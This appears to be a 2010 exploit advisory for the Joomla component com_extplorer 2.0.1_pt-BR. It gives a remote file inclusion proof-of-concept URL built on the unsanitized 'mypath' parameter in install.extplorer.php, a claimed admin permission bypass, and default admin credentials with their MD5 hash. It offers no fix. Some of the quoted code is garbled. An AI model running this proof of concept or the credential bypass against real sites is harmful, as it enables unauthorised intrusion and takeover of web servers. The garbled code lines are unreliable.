#################################################################
Joomla component com_extplorer_2.0.1_pt-BR <= Multiple Vulnerability
exploits
#################################################################
Link: http://joomlacode.org/gf/project/joomlaxplorer
Version: 2.0.1_pt-BR
Project: http://sourceforge.net/projects/extplorer
License: GPL/MPL
#################################################################
Author: eidelweiss
Date: 2010/03/23 9:50 AM (GMT+7)
Contact: eidelweiss[at]cyberservices[dot]com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee -
idiot_inside - kuris
Special: AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)
Dedicat: psychotic_girls (dodol gue td lg sarapan , nih hasil gue coding
pas nungguin loe td)
#################################################################
RFI
#################################################################
-=[ BUG ]=-
[+] install.extplorer.php
-=[ VULN ]=-
require_once($mypath . "/include/functions.php");
require_once($mypath . "/libraries/Archive/archive.php");
-=[ P0C ]=-
../administrator/components/com_extplorer/install.extplorer.php?mypath=
[inj3ct0r]
#################################################################
bypass admin permision
#################################################################
Users can be defined by using the Admin-section
$GLOBALS["users"]=array
($_SERVER['DOCUMENT_ROOT'])?realpath(dirname(FILE).'/…'):$_SERVER['DOCUMENT_ROOT'],"http://localhost",1,"",7,1),
user: admin
pass: 21232f297a57a5a743894a0e4a801fc3 // md5
#################################################################
[ FIX ] Use Your Skill and Play Your Imagination
#################################################################
#################################################################